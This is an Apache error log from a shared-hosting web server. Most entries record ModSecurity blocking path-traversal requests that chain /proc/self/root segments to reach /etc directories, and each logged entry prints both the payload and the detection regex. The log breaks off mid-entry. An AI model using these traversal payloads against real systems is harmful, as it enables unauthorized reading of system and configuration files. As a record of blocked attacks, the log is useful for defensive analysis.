[Fri Mar 20 02:42:43.065863 2026] [proxy_fcgi:error] [pid 30077:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:54080] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:42:52.147169 2026] [:error] [pid 26799:tid 140411632822016] [client 74.7.241.31:47942] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzeXNa6ubjKNq_cu4aUCAAAA00"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 02:43:00.138389 2026] [:error] [pid 30424:tid 140411624429312] [client 74.7.241.31:44434] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzeZMt36Dv4L1GW-s-eRgAAAY4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 02:43:00.337702 2026] [:error] [pid 30424:tid 140411699963648] [client 74.7.241.31:44434] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzeZMt36Dv4L1GW-s-eRwAAAYU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 02:43:00.959722 2026] [:error] [pid 30424:tid 140411741927168] [client 74.7.241.31:44434] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzeZMt36Dv4L1GW-s-eSAAAAYA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 02:43:02.150023 2026] [:error] [pid 17887:tid 140411658000128] [client 74.7.243.128:48744] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzeZgkwaGbbGflqUZAKkwAAAMo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 02:43:02.865875 2026] [core:alert] [pid 30077:tid 140411741927168] [client 57.141.18.38:57832] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Fri Mar 20 02:43:05.133787 2026] [proxy_fcgi:error] [pid 30424:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:54698] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:43:07.959394 2026] [:error] [pid 26799:tid 140411733534464] [client 74.7.241.31:49286] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzea9a6ubjKNq_cu4aUFQAAA0E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 02:43:08.795049 2026] [:error] [pid 26799:tid 140411716749056] [client 74.7.243.128:43904] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzebNa6ubjKNq_cu4aUFgAAA0M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 02:43:12.324450 2026] [:error] [pid 15826:tid 140411540502272] [client 74.7.241.31:49300] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzecOoXxyEfFpUF8f9KcQAAAVg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 02:43:15.513165 2026] [:error] [pid 21219:tid 140411599251200] [client 74.7.243.128:53530] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzecvXLqtnMIWvjpaJdbAAAApE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 02:43:15.514423 2026] [:error] [pid 31215:tid 140411632822016] [client 74.7.241.31:49310] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzecgF0L0L-SsrnPo4uVQAAAs0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 02:43:19.488763 2026] [:error] [pid 26799:tid 140411683178240] [client 74.7.241.31:49320] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzed9a6ubjKNq_cu4aUHwAAA0c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 02:43:22.844565 2026] [:error] [pid 30077:tid 140411632822016] [client 74.7.241.31:55510] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzeevu8EFLIOrSqIpvlMwAAAk0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 02:43:25.139751 2026] [:error] [pid 7235:tid 140411708356352] [client 74.7.243.128:53536] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzeffqxLDW4GITHUkSokwAAAQQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 02:43:26.446991 2026] [:error] [pid 30424:tid 140411607643904] [client 74.7.241.31:55526] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzefst36Dv4L1GW-s-eVAAAAZA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 02:43:28.137826 2026] [proxy_fcgi:error] [pid 21219:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:55412] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:43:30.264261 2026] [:error] [pid 26799:tid 140411565680384] [client 74.7.241.31:38384] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzegta6ubjKNq_cu4aUJgAAA1U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 02:43:31.459747 2026] [:error] [pid 8307:tid 140411599251200] [client 74.7.243.128:50724] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzeg7-FhjpZGs9ba8qqgwAAAxE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 02:43:32.906462 2026] [:error] [pid 30424:tid 140411733534464] [client 74.7.241.31:38400] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzehMt36Dv4L1GW-s-eWwAAAYE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 02:43:33.035203 2026] [:error] [pid 30424:tid 140411599251200] [client 74.7.241.31:38400] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzehct36Dv4L1GW-s-eXAAAAZE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 02:43:35.241166 2026] [:error] [pid 26799:tid 140411540502272] [client 74.7.241.31:38416] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzeh9a6ubjKNq_cu4aULgAAA1g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 02:43:35.689583 2026] [:error] [pid 30077:tid 140411557287680] [client 74.7.243.128:39808] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzeh_u8EFLIOrSqIpvlPwAAAlY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 02:43:36.887754 2026] [:error] [pid 30424:tid 140411641214720] [client 74.7.241.31:38432] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzeiMt36Dv4L1GW-s-eXwAAAYw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 02:43:37.612683 2026] [:error] [pid 17887:tid 140411741927168] [client 74.7.243.128:39822] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname 